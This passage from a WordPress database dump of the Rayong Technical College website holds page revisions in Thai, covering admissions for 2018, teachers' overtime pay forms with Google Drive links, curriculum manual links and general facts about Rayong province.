'http://www.technicrayong.ac.th/806-autosave-v1/', 0, 'revision', '', 0),
(1022, 1, '2018-02-06 18:56:17', '2018-02-06 11:56:17', '<img class=\"aligncenter wp-image-807 size-full\" src=\"/wp-content/uploads/2018/01/27024291_535295693513290_2564198707510501767_o.jpg\" alt=\"\" width=\"2498\" height=\"656\" />\r\n\r\n<a href=\"/wp-content/uploads/2018/01/201802061754_Page_01.png\"><img class=\"aligncenter size-large wp-image-1007\" src=\"/wp-content/uploads/2018/01/201802061754_Page_01-688x1024.png\" alt=\"\" width=\"640\" height=\"953\" /></a>\r\n\r\n<a href=\"/wp-content/uploads/2018/01/201802061754_Page_02.png\"><img class=\"aligncenter size-large wp-image-1008\" src=\"/wp-content/uploads/2018/01/201802061754_Page_02-694x1024.png\" alt=\"\" width=\"640\" height=\"944\" /></a>\r\n\r\n<a href=\"/wp-content/uploads/2018/01/201802061754_Page_03.png\"><img class=\"aligncenter size-large wp-image-1009\" src=\"/wp-content/uploads/2018/01/201802061754_Page_03-690x1024.png\" alt=\"\" width=\"640\" height=\"950\" /></a>\r\n\r\n<a href=\"/wp-content/uploads/2018/01/201802061754_Page_04.png\"><img class=\"aligncenter size-large wp-image-1010\" src=\"/wp-content/uploads/2018/01/201802061754_Page_04-690x1024.png\" alt=\"\" width=\"640\" height=\"950\" /></a>\r\n\r\n<a href=\"/wp-content/uploads/2018/01/201802061754_Page_05.png\"><img class=\"aligncenter size-large wp-image-1011\" src=\"/wp-content/uploads/2018/01/201802061754_Page_05-685x1024.png\" alt=\"\" width=\"640\" height=\"957\" /></a>\r\n\r\n<a href=\"/wp-content/uploads/2018/01/201802061754_Page_06.png\"><img class=\"aligncenter size-large wp-image-1012\" src=\"/wp-content/uploads/2018/01/201802061754_Page_06-735x1024.png\" alt=\"\" width=\"640\" height=\"892\" /></a>\r\n\r\n<a href=\"/wp-content/uploads/2018/01/201802061754_Page_07.png\"><img class=\"aligncenter size-large wp-image-1013\" src=\"/wp-content/uploads/2018/01/201802061754_Page_07-687x1024.png\" alt=\"\" width=\"640\" height=\"954\" /></a>\r\n\r\n<a href=\"/wp-content/uploads/2018/01/201802061754_Page_08.png\"><img class=\"aligncenter size-large wp-image-1014\" src=\"/wp-content/uploads/2018/01/201802061754_Page_08-690x1024.png\" alt=\"\" width=\"640\" height=\"950\" /></a>\r\n\r\n<a href=\"/wp-content/uploads/2018/01/201802061754_Page_09.png\"><img class=\"aligncenter size-large wp-image-1015\" src=\"/wp-content/uploads/2018/01/201802061754_Page_09-688x1024.png\" alt=\"\" width=\"640\" height=\"953\" /></a>\r\n\r\n<a href=\"/wp-content/uploads/2018/01/201802061754_Page_10.png\"><img class=\"aligncenter size-large wp-image-1016\" src=\"/wp-content/uploads/2018/01/201802061754_Page_10-700x1024.png\" alt=\"\" width=\"640\" height=\"936\" /></a>\r\n\r\n<a href=\"/wp-content/uploads/2018/01/201802061754_Page_11.png\"><img class=\"aligncenter size-large wp-image-1017\" src=\"/wp-content/uploads/2018/01/201802061754_Page_11-681x1024.png\" alt=\"\" width=\"640\" height=\"962\" /></a>', 'วิทยาลัยเทคนิคระยองเปิดรับสมัคร นักเรียน นักศึกษา ปีการศึกษา 2561 หลักสูตร ปวช. ,ปวส. และปริญญาตรี', '', 'inherit', 'closed', 'closed', '', '806-revision-v1', '', '', '2018-02-06 18:56:17', '2018-02-06 11:56:17', '', 806, 'http://www.technicrayong.ac.th/806-revision-v1/', 0, 'revision', '', 0),
(1024, 4, '2018-02-06 19:30:50', '2018-02-06 12:30:50', '<strong>เอกสารประกอบการเบิกจ่ายเงินค่าสอนเกินภาระงานการสอน</strong>\r\n<ul>\r\n <li>ใบปะหน้าใบเบิกเงินค่าสอนเกินภาระงานการสอน <a href=\"https://drive.google.com/open?id=1j65OP0O27_4Yj6xNKq35_CqYp1kx1R5Y\"><em> คลิก</em></a></li>\r\n</ul>', 'งานพัฒนาหลักสูตรและการเรียนการสอน', '', 'inherit', 'closed', 'closed', '', '1000-revision-v1', '', '', '2018-02-06 19:30:50', '2018-02-06 12:30:50', '', 1000, 'http://www.technicrayong.ac.th/1000-revision-v1/', 0, 'revision', '', 0),
(1028, 4, '2018-02-06 22:34:17', '2018-02-06 15:34:17', '<strong>เอกสารประกอบสำหรับครูผู้สอน</strong>\r\n<ul>\r\n <li>ใบปะหน้าใบเบิกเงินค่าสอนเกินภาระงานการสอน <a href=\"https://drive.google.com/open?id=1j65OP0O27_4Yj6xNKq35_CqYp1kx1R5Y\"><em> คลิก</em></a></li>\r\n</ul>', 'งานพัฒนาหลักสูตรและการเรียนการสอน', '', 'inherit', 'closed', 'closed', '', '1000-revision-v1', '', '', '2018-02-06 22:34:17', '2018-02-06 15:34:17', '', 1000, 'http://www.technicrayong.ac.th/1000-revision-v1/', 0, 'revision', '', 0),
(1032, 4, '2018-02-06 22:37:28', '2018-02-06 15:37:28', '<strong>เอกสารสำหรับครูผู้สอน</strong>\r\n<ul>\r\n <li>ใบปะหน้าใบเบิกเงินค่าสอนเกินภาระงานการสอน <a href=\"https://drive.google.com/open?id=1j65OP0O27_4Yj6xNKq35_CqYp1kx1R5Y\"><em> คลิก</em></a></li>\r\n</ul>', 'งานพัฒนาหลักสูตรและการเรียนการสอน', '', 'inherit', 'closed', 'closed', '', '1000-revision-v1', '', '', '2018-02-06 22:37:28', '2018-02-06 15:37:28', '', 1000, 'http://www.technicrayong.ac.th/1000-revision-v1/', 0, 'revision', '', 0),
(1033, 4, '2018-02-06 22:41:07', '2018-02-06 15:41:07', '<hr />\r\n\r\nแบบฟอร์มสอนแทน\r\n\r\n<hr />\r\n\r\nแบบฟอร์มสอนชดเชย\r\n\r\n<hr />\r\n\r\n<a href=\"https://drive.google.com/open?id=1GPjTvihsnS-4DB43Lq9A6Gnc1EACKfa7\">แบบฟอร์มใบเบิกค่าสอนเกินภาระงานสำหรับ ครูสอน</a>\r\n\r\n<hr />\r\n\r\nแบบฟอร์มนิเทศการสอน\r\n\r\n<hr />\r\n\r\nแบบฟอร์มประเมินแผนการจัดการเรียนรู้\r\n\r\n<hr />\r\n\r\nแบบฟอร์มโครงการสอน\r\n\r\n<hr />\r\n\r\nแบบฟอร์มแผนจัดการเรียนรู้\r\n\r\n<hr />\r\n\r\nแบบฟอร์มบันทึกการสอน\r\n\r\n<hr />\r\n\r\n<a href=\"https://drive.google.com/file/d/1QYe6ETuFyXakmTmwTxRqW5Dg7t7Hd8Bq/view?usp=sharing\">แบบฟอร์มใบปะหน้าใบเบิกค่าสอนเกินภาระงาน</a>\r\n\r\n<hr />\r\n\r\n<a href=\"https://drive.google.com/open?id=1YhOMDlJSOYmtlIAUDqAgM_MS_Fr5aj_S\">บันทึกข้อความมอบหน้าที่ทำใบเบิก</a>\r\n\r\n<hr />\r\n\r\nแบบฟอร์ม สมอ.1 แบบเสนอรายชื่อหนังสือเรียนตามนโยบายเรียนฟรี 15 ปี\r\n\r\n<hr />\r\n\r\nแบบฟอร์ม สมอ.2 แบบรายงานการจัดซื้อหนังสือเรียนตามนโยบายเรียนฟรี 15 ปี', 'เอกสารสำหรับครูผู้สอน', '', 'publish', 'closed', 'closed', '', '%e0%b9%80%e0%b8%ad%e0%b8%81%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b3%e0%b8%ab%e0%b8%a3%e0%b8%b1%e0%b8%9a%e0%b8%84%e0%b8%a3%e0%b8%b9%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%aa%e0%b8%ad%e0%b8%99', '', '', '2018-09-28 05:12:04', '2018-09-27 22:12:04', '', 0, 'http://www.technicrayong.ac.th/?page_id=1033', 0, 'page', '', 0),
(1034, 4, '2018-02-06 22:41:07', '2018-02-06 15:41:07', 'ใบปะหน้าใบเบิก', 'เอกสารสำหรับครูผู้สอน', '', 'inherit', 'closed', 'closed', '', '1033-revision-v1', '', '', '2018-02-06 22:41:07', '2018-02-06 15:41:07', '', 1033, 'http://www.technicrayong.ac.th/1033-revision-v1/', 0, 'revision', '', 0),
(1035, 4, '2018-02-06 22:46:08', '2018-02-06 15:46:08', '<a href=\"https://wp.me/P9wTWB-gF\"><strong>เอกสารสำหรับครูผู้สอน</strong></a>', 'งานพัฒนาหลักสูตรและการเรียนการสอน', '', 'inherit', 'closed', 'closed', '', '1000-revision-v1', '', '', '2018-02-06 22:46:08', '2018-02-06 15:46:08', '', 1000, 'http://www.technicrayong.ac.th/1000-revision-v1/', 0, 'revision', '', 0),
(1036, 4, '2018-09-28 05:10:18', '2018-09-27 22:10:18', '<hr />\n\nแบบฟอร์มสอนแทน\n\n<hr />\n\nแบบฟอร์มสอนชดเชย\n\n<hr />\n\n<a href=\"https://drive.google.com/open?id=1GPjTvihsnS-4DB43Lq9A6Gnc1EACKfa7\">แบบฟอร์มใบเบิกค่าสอนเกินภาระงานสำหรับ ครูสอน</a>\n\n<hr />\n\n \n\nแบบฟอร์มนิเทศการสอน\n\n<hr />\n\nแบบฟอร์มประเมินแผนการจัดการเรียนรู้\n\n<hr />\n\nแบบฟอร์มโครงการสอน\n\n<hr />\n\nแบบฟอร์มแผนจัดการเรียนรู้\n\nแบบฟอร์\n\nมบันทึกการสอน\n\n<hr />\n\n \n\n<a href=\"https://drive.google.com/file/d/1QYe6ETuFyXakmTmwTxRqW5Dg7t7Hd8Bq/view?usp=sharing\">แบบฟอร์มใบปะหน้าใบเบิกค่าสอนเกินภาระงาน</a>\n\n<hr />\n\n<a href=\"https://drive.google.com/open?id=1YhOMDlJSOYmtlIAUDqAgM_MS_Fr5aj_S\">บันทึกข้อความมอบหน้าที่ทำใบเบิก</a>\n\n<hr />\n\nแบบฟอร์ม สมอ.1 แบบเสนอรายชื่อหนังสือเรียนตามนโยบายเรียนฟรีี เรียนดี 15 ปี\n\n<hr />\n\nแบบฟอร์ม สมอ.2 แบบรายงานการจัดซื้อหนังสือเรียน\n\n ', 'เอกสารสำหรับครูผู้สอน', '', 'inherit', 'closed', 'closed', '', '1033-autosave-v1', '', '', '2018-09-28 05:10:18', '2018-09-27 22:10:18', '', 1033, 'http://www.technicrayong.ac.th/1033-autosave-v1/', 0, 'revision', '', 0),
(1037, 4, '2018-02-06 22:49:38', '2018-02-06 15:49:38', '<a href=\"https://drive.google.com/open?id=1j65OP0O27_4Yj6xNKq35_CqYp1kx1R5Y\">ใบปะหน้าใบเบิกเงินค่าสอนเกินภาระงานการสอน</a>', 'เอกสารสำหรับครูผู้สอน', '', 'inherit', 'closed', 'closed', '', '1033-revision-v1', '', '', '2018-02-06 22:49:38', '2018-02-06 15:49:38', '', 1033, 'http://www.technicrayong.ac.th/1033-revision-v1/', 0, 'revision', '', 0),
(1038, 4, '2018-02-07 02:24:26', '2018-02-06 19:24:26', '<a href=\"https://drive.google.com/open?id=1j65OP0O27_4Yj6xNKq35_CqYp1kx1R5Y\">ใบปะหน้าใบเบิกเงินค่าสอนเกินภาระงานการสอน</a>\r\n\r\nใบเบิกเงินค่าสอนเกินภาระงานการสอน สัปดาห์ที่ 13 มกราคม', 'เอกสารสำหรับครูผู้สอน', '', 'inherit', 'closed', 'closed', '', '1033-revision-v1', '', '', '2018-02-07 02:24:26', '2018-02-06 19:24:26', '', 1033, 'http://www.technicrayong.ac.th/1033-revision-v1/', 0, 'revision', '', 0),
(1039, 4, '2018-02-07 02:26:02', '2018-02-06 19:26:02', '<a href=\"https://drive.google.com/open?id=1j65OP0O27_4Yj6xNKq35_CqYp1kx1R5Y\">ใบปะหน้าใบเบิกเงินค่าสอนเกินภาระงานการสอน</a>\r\n\r\n<a href=\"https://drive.google.com/file/d/1WbLQoWBt5VMRRaLHuXdO0oNrfVoain_Q/view?usp=sharing\">ใบเบิกเงินค่าสอนเกินภาระงานการสอน สัปดาห์ที่ 13 มกราคม</a>', 'เอกสารสำหรับครูผู้สอน', '', 'inherit', 'closed', 'closed', '', '1033-revision-v1', '', '', '2018-02-07 02:26:02', '2018-02-06 19:26:02', '', 1033, 'http://www.technicrayong.ac.th/1033-revision-v1/', 0, 'revision', '', 0),
(1040, 4, '2018-02-07 02:49:49', '2018-02-06 19:49:49', '', '1', '', 'inherit', 'closed', 'closed', '', '1', '', '', '2018-02-07 02:49:49', '2018-02-06 19:49:49', '', 1000, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/02/1.jpg', 0, 'attachment', 'image/jpeg', 0),
(1041, 4, '2018-02-07 02:51:14', '2018-02-06 19:51:14', '<a href=\"http://bsq2.vec.go.th/document/%E0%B8%84%E0%B8%B9%E0%B9%88%E0%B8%A1%E0%B8%B7%E0%B8%AD%E0%B8%88%E0%B8%B1%E0%B8%94%E0%B8%97%E0%B8%B3%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%88%E0%B8%B1%E0%B8%94%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99%E0%B8%A3%E0%B8%B9%E0%B9%89%E0%B8%A1%E0%B8%B8%E0%B9%88%E0%B8%87%E0%B9%80%E0%B8%99%E0%B9%89%E0%B8%99%E0%B8%AA%E0%B8%A1%E0%B8%A3%E0%B8%A3%E0%B8%96%E0%B8%99%E0%B8%B0%20(%E0%B9%80%E0%B8%A5%E0%B9%88%E0%B8%A1%E0%B8%97%E0%B8%B5%E0%B9%88%201)/%E0%B9%80%E0%B8%A5%E0%B9%88%E0%B8%A1%E0%B8%97%E0%B8%B5%E0%B9%881.rar\">คู่มือการจัดทำแผนการเรียนรู้มุ่งเน้นสมรรถนะ </a>\r\n\r\n<a href=\"http://bsq2.vec.go.th/document/%E0%B8%84%E0%B8%B9%E0%B9%88%E0%B8%A1%E0%B8%B7%E0%B8%AD%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%80%E0%B8%82%E0%B8%B5%E0%B8%A2%E0%B8%99%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%87%E0%B8%B2%E0%B8%99%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%A7%E0%B8%B4%E0%B8%88%E0%B8%B1%E0%B8%A2%E0%B9%80%E0%B8%9E%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%9E%E0%B8%B1%E0%B8%92%E0%B8%99%E0%B8%B2%E0%B8%84%E0%B8%B8%E0%B8%A3%E0%B8%A0%E0%B8%B2%E0%B8%9E%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%88%E0%B8%B1%E0%B8%94%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%AA%E0%B8%AD%E0%B8%99%E0%B8%AD%E0%B8%B2%E0%B8%8A%E0%B8%B5%E0%B8%A7%E0%B8%A8%E0%B8%B6%E0%B8%81%E0%B8%A9%E0%B8%B2/%E0%B9%80%E0%B8%A5%E0%B9%88%E0%B8%A1%E0%B8%97%E0%B8%B5%E0%B9%882.rar\">คู่มือการเขียนรายงานการวิจัย</a>\r\n\r\n<a href=\"https://wp.me/P9wTWB-gF\"><strong>เอกสารสำหรับครูผู้สอน</strong></a>\r\n\r\n ', 'งานพัฒนาหลักสูตรและการเรียนการสอน', '', 'inherit', 'closed', 'closed', '', '1000-revision-v1', '', '', '2018-02-07 02:51:14', '2018-02-06 19:51:14', '', 1000, 'http://www.technicrayong.ac.th/1000-revision-v1/', 0, 'revision', '', 0),
(1042, 4, '2018-02-07 02:53:55', '2018-02-06 19:53:55', '<a href=\"http://bsq2.vec.go.th/document/%E0%B8%84%E0%B8%B9%E0%B9%88%E0%B8%A1%E0%B8%B7%E0%B8%AD%E0%B8%88%E0%B8%B1%E0%B8%94%E0%B8%97%E0%B8%B3%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%88%E0%B8%B1%E0%B8%94%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99%E0%B8%A3%E0%B8%B9%E0%B9%89%E0%B8%A1%E0%B8%B8%E0%B9%88%E0%B8%87%E0%B9%80%E0%B8%99%E0%B9%89%E0%B8%99%E0%B8%AA%E0%B8%A1%E0%B8%A3%E0%B8%A3%E0%B8%96%E0%B8%99%E0%B8%B0%20(%E0%B9%80%E0%B8%A5%E0%B9%88%E0%B8%A1%E0%B8%97%E0%B8%B5%E0%B9%88%201)/%E0%B9%80%E0%B8%A5%E0%B9%88%E0%B8%A1%E0%B8%97%E0%B8%B5%E0%B9%881.rar\">คู่มือการจัดทำแผนการเรียนรู้มุ่งเน้นสมรรถนะ </a>\r\n\r\n<a href=\"http://bsq2.vec.go.th/document/%E0%B8%84%E0%B8%B9%E0%B9%88%E0%B8%A1%E0%B8%B7%E0%B8%AD%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%80%E0%B8%82%E0%B8%B5%E0%B8%A2%E0%B8%99%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%87%E0%B8%B2%E0%B8%99%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%A7%E0%B8%B4%E0%B8%88%E0%B8%B1%E0%B8%A2%E0%B9%80%E0%B8%9E%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%9E%E0%B8%B1%E0%B8%92%E0%B8%99%E0%B8%B2%E0%B8%84%E0%B8%B8%E0%B8%A3%E0%B8%A0%E0%B8%B2%E0%B8%9E%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%88%E0%B8%B1%E0%B8%94%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%AA%E0%B8%AD%E0%B8%99%E0%B8%AD%E0%B8%B2%E0%B8%8A%E0%B8%B5%E0%B8%A7%E0%B8%A8%E0%B8%B6%E0%B8%81%E0%B8%A9%E0%B8%B2/%E0%B9%80%E0%B8%A5%E0%B9%88%E0%B8%A1%E0%B8%97%E0%B8%B5%E0%B9%882.rar\">คู่มือการเขียนรายงานการวิจัย</a>\r\n\r\n<a href=\"https://wp.me/P9wTWB-gF\"><strong>แบบฟอร์มสำหรับครูผู้สอน</strong></a>\r\n\r\n ', 'งานพัฒนาหลักสูตรและการเรียนการสอน', '', 'inherit', 'closed', 'closed', '', '1000-revision-v1', '', '', '2018-02-07 02:53:55', '2018-02-06 19:53:55', '', 1000, 'http://www.technicrayong.ac.th/1000-revision-v1/', 0, 'revision', '', 0),
(1043, 4, '2018-02-07 09:22:44', '2018-02-07 02:22:44', '<a href=\"https://drive.google.com/open?id=1j65OP0O27_4Yj6xNKq35_CqYp1kx1R5Y\">ใบปะหน้าใบเบิกเงินค่าสอนเกินภาระงานการสอน</a>\r\n\r\n<a href=\"https://drive.google.com/open?id=1h_sN74KGcDnitsAWiDiM2jXvZIlZBqJn\">ใบเบิกเงินค่าสอนเกินภาระงานการสอน สัปดาห์ที่ 13 มกราคม</a>', 'เอกสารสำหรับครูผู้สอน', '', 'inherit', 'closed', 'closed', '', '1033-revision-v1', '', '', '2018-02-07 09:22:44', '2018-02-07 02:22:44', '', 1033, 'http://www.technicrayong.ac.th/1033-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1045, 3, '2018-02-07 09:26:16', '2018-02-07 02:26:16', '<img class=\"aligncenter wp-image-822 size-full\" src=\"/wp-content/uploads/2018/01/GPP55-e1517214593488.jpg\" alt=\"\" width=\"1106\" height=\"700\" />\r\n<h3 id=\"sites-page-title-header\" align=\"left\"><span id=\"sites-page-title\" dir=\"ltr\" style=\"color: #0000ff;\" tabindex=\"-1\">ข้อมูลทั่วไปจังหวัดระยอง</span></h3>\r\n<div> ระยอง....เป็นจังหวัดขนาดเล็กแห่งหนึ่งในภาคตะวันออกของประเทศ เป็นที่รู้จักในปัจจุบันว่าเป็นแหล่งท่องเที่ยว มีผลไม้ชั้นยอด เป็นแหล่งอุตสาหกรรมหลักของประเทศ มีสภาพเศรษฐกิจดี มีรายได้<span lang=\"TH\">ต่อหัวประชากรสูงเป็นอันดับหนึ่งของประเทศ คือ 1</span>,<span lang=\"TH\">143</span>,<span lang=\"TH\">740 บาท/ คน ผลิตภัณฑ์มวลรวมจังหวัด (</span>GPP<span lang=\"TH\">) เท่ากับ</span> <span lang=\"TH\">672</span>,<span lang=\"TH\">104 ล้านบาท ซึ่งมาจากสาขาการผลิตด้านอุตสาหกรรมและเหมืองแร่ กว่าร้อยละ 92</span></div>\r\n<div> แต่เดิมจังหวัดระยองเป็นที่รู้จักในฐานะเมืองผลไม้ดีของภาคตะวันออ ไม่ว่าจะเป็นมังคุด ทุเรียน เงาะ รวมทั้งอาหารทะเลสด แปรรูป กะปิ น้ำปลา เนื่องจากสภาพดินฟ้าอากาศที่เอื้ออำนวย และสภาพภูมิประเทศที่เหมาะสม นอกจากนี้ยังได้ชื่อว่าเป็นเมืองท่องเที่ยวที่สวยงาม มีชายหาดยาวสวยเลียบขนานไปกับอ่าวไทย และเกาะสวยงามระดับโลก เช่น เกาะเสม็ดที่รู้จักกันแพร่หลายท่ามกลางนักท่องเที่ยวชาวไทย และ<span lang=\"TH\">ชาวต่างประเทศฐานเศรษฐกิจที่สำคัญของจังหวัด คือ ภาคเกษตรกรรม การท่องเที่ยวและภาคอุตสาหกรรม (ข้อมูลสรุปจังหวัดระยอง ปี </span>2553<span lang=\"TH\">)</span></div>\r\n<div> จังหวัดระยองเริ่มมีการเปลี่ยนแปลงเป็นจังหวัดอุตสาหกรรม นับตั้งแต่ค้นพบก๊าซธรรมชาติ <span lang=\"TH\">ในอ่าวไทยเมื่อปี พ</span>.<span lang=\"TH\">ศ</span>. 2520 <span lang=\"TH\">เป็นการเริ่มต้นยุค </span>“<span lang=\"TH\">โชติช่วงชัชวาล</span>”<span lang=\"TH\"> และเป็นที่มาของ </span>“<span lang=\"TH\">โครงการพัฒนาพื้นที่ชายฝั่งทะเลภาคตะวันออก</span>”<span lang=\"TH\"> ( </span>Eastern Seaboard Development Program<span lang=\"TH\"> ) ในปี 2524 ช่วงระยะเวลาเกือบ 30 ปี ทำให้โครงสร้างทางเศรษฐกิจของจังหวัดระยองเปลี่ยนเป็นอุตสาหกรรมนำการท่องเที่ยวและเกษตรกรรม <span style=\"color: #0000ff;\">>>>></span></span><a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=category&layout=blog&id=62&Itemid=135\"><span style=\"color: #0000ff;\">ข้อมูลเพิ่มเติม</span></a></div>\r\n<div></div>\r\n<div></div>\r\n<img class=\"aligncenter wp-image-826 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-06-39.jpg\" alt=\"\" width=\"696\" height=\"632\" />\r\n\r\n<img class=\"wp-image-827 size-full aligncenter\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-09-24.jpg\" alt=\"\" width=\"645\" height=\"271\" />\r\n<h3><span style=\"color: #0000ff;\"><b><span lang=\"TH\">ขนาดและที่ตั้ง</span></b></span></h3>\r\n<div>\r\n<div>\r\n\r\n<span lang=\"TH\">จังหวัดระยองมีพื้นที่ประมาณ </span>3,552 <span lang=\"TH\">ตารางกิโลเมตร หรือ </span>2,220,000 <span lang=\"TH\">ไร่</span><span lang=\"TH\"> ตั้งอยู่ในภาคตะวันออกของประเทศไทยระหว่างเส้นรุ้งที่ </span>12-13 <span lang=\"TH\">องศาเหนือ และเส้นแวงที่ </span>101-102 <span lang=\"TH\">องศาตะวันออก ห่างจากกรุงเทพฯ ประมาณ </span>179 <span lang=\"TH\">กิโลเมตร</span><span lang=\"TH\"> มีอาณาเขตติดต่อกับจังหวัดใกล้เคียงดังนี้</span>\r\n\r\n</div>\r\n</div>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<div>\r\n<div>\r\n\r\n<b><span lang=\"TH\">ทิศเหนือ </span></b><span lang=\"TH\"> ติดต่อกับเขตอำเภอหนองใหญ่ อำเภอบ่อทอง และอำเภอศรีราชา</span>ของจังหวัดชลบุรี\r\n\r\n</div>\r\n</div></blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<div>\r\n<div>\r\n\r\n<b><span lang=\"TH\">ทิศใต</span></b><span lang=\"TH\">้ จดทะเลอ่าวไทย พื้นที่ฝั่งทะเลยาวประมาณ </span>100 <span lang=\"TH\">กิโลเมตร</span><span lang=\"TH\"> ของอ่าวไทย</span>\r\n\r\n</div>\r\n</div></blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<div>\r\n<div>\r\n\r\n<b><span lang=\"TH\">ทิศตะวันออก</span></b> <span lang=\"TH\"> ติดต่อกับเขตอำเภอท่าใหม่ อำเภอนายายอาม ของจังหวัดจันทบุรี</span>\r\n\r\n</div>\r\n</div></blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<div>\r\n<div>\r\n\r\n<b><span lang=\"TH\">ทิศตะวันตก</span></b> <span lang=\"TH\"> ติดต่อกับเขตอำเภอสัตหีบ อำเภอบางละมุง ของจังหวัดชลบุรี</span>\r\n\r\n</div>\r\n</div></blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n<strong><span style=\"color: #0000ff;\"> <a href=\"http://www.oceansmile.com/map/k/3178.gif\"><img class=\"aligncenter wp-image-830 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-44-46.jpg\" alt=\"\" width=\"1076\" height=\"707\" /></a> </span></strong>\r\n<h3><span style=\"color: #0000ff;\"><b><span lang=\"TH\">การปกครองและประชากร</span></b></span></h3>\r\n<span lang=\"TH\">แบ่งเขตการปกครองเป็น</span> 8 <span lang=\"TH\">อำเภอ โดยประกอบด้วย</span> 54 <span lang=\"TH\">ตำบล</span> 439 <span lang=\"TH\">หมู่บ้าน</span> 80 <span lang=\"TH\">ชุมชน ส่วนด้านการปกครองท้องถิ่น ประกอบด้วย องค์การบริหารส่วนจังหวัด</span> 1 <span lang=\"TH\">แห่ง เทศบาลนคร</span> 1 <span lang=\"TH\">แห่ง เทศบาลเมือง</span> 2 <span lang=\"TH\">แห่ง เทศบาลตำบล 24 แห่ง และองค์การบริหารส่วนตำบล</span> 4<span lang=\"TH\">0 แห่ง ประชากรของจังหวัดระยอง ณ ธันวาคม </span>2558 <span lang=\"TH\">มีทั้งสิ้น</span> 688,999<span lang=\"TH\"> คน เป็นชาย 339</span>,333<span lang=\"TH\"> คน คิดเป็นร้อยละ</span>49.33 <span lang=\"TH\">เป็นหญิง 349,666 คน คิดเป็นร้อยละ</span> 50.67 <span lang=\"TH\">ของประชากรทั้งหมด อำเภอที่มีประชากรมากที่สุด คือ อำเภอเมือง มีจำนวน</span> 271,460 <span lang=\"TH\">คน อำเภอที่มีประชากรน้อยที่สุด คือ อำเภอเขาชะเมา มีจำนวน</span> 23,816<span lang=\"TH\"> คน จำนวนครัวเรือนทั้งจังหวัดรวม</span> 3<span lang=\"TH\">23</span>,<span lang=\"TH\">056 ครัวเรือน อำเภอเมืองระยองมีความหนาแน่นของประชากรมากที่สุด คือ</span> 527.60 <span lang=\"TH\">คนต่อหนึ่งตารางกิโลเมตร รองลงมาคือ อำเภอบ้านฉาง</span>292.10 <span lang=\"TH\">คนต่อหนึ่งตารางกิโลเมตร อำเภอที่มีประชากรหนาแน่นน้อยที่สุด คืออำเภอวังจันทร์ 65.8 คนต่อหนึ่งตารางกิโลเมตร จากการคาดการณ์ว่าประชากรของจังหวัดระยองจะเพิ่มเป็น</span> 698,017 <span lang=\"TH\">คนในปี</span> 2561 <span lang=\"TH\">แต่ในสภาพความเป็นจริง จังหวัดระยองมีประชากรมากกว่าตัวเลขในทะเบียนราษฎร์ไม่ต่ำกว่า</span> 300,000 <span lang=\"TH\">คน ทั้งนี้เกิดจากการอพยพเข้ามาในแรงงานภาคอุตสาหกรรมและการบริการ และมีแนวโน้มที่จะเพิ่มขึ้นอย่างรวดเร็วตามการเติบโตของภาคอุตสาหกรรม</span>\r\n<h3></h3>\r\n<h4><span style=\"color: #0000ff;\">ข้อมูลด้านประวัติศาสตร์ ภูมิศาสตร์ เศรษฐกิจ สังคม การศึกษา และสาระที่เป็นประโยชน์ด้านอื่น ๆ </span><span style=\"color: #0000ff;\">เกี่ยวกับจังหวัดระยองเพิ่มเติม >>>> ตามเวปไซต์ และ LINK ด้านล่าง</span></h4>\r\n<h3><span style=\"color: #0000ff;\"><a href=\"http://www.rayong.go.th/\"><img class=\"alignleft wp-image-831 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-58-38.jpg\" alt=\"\" width=\"698\" 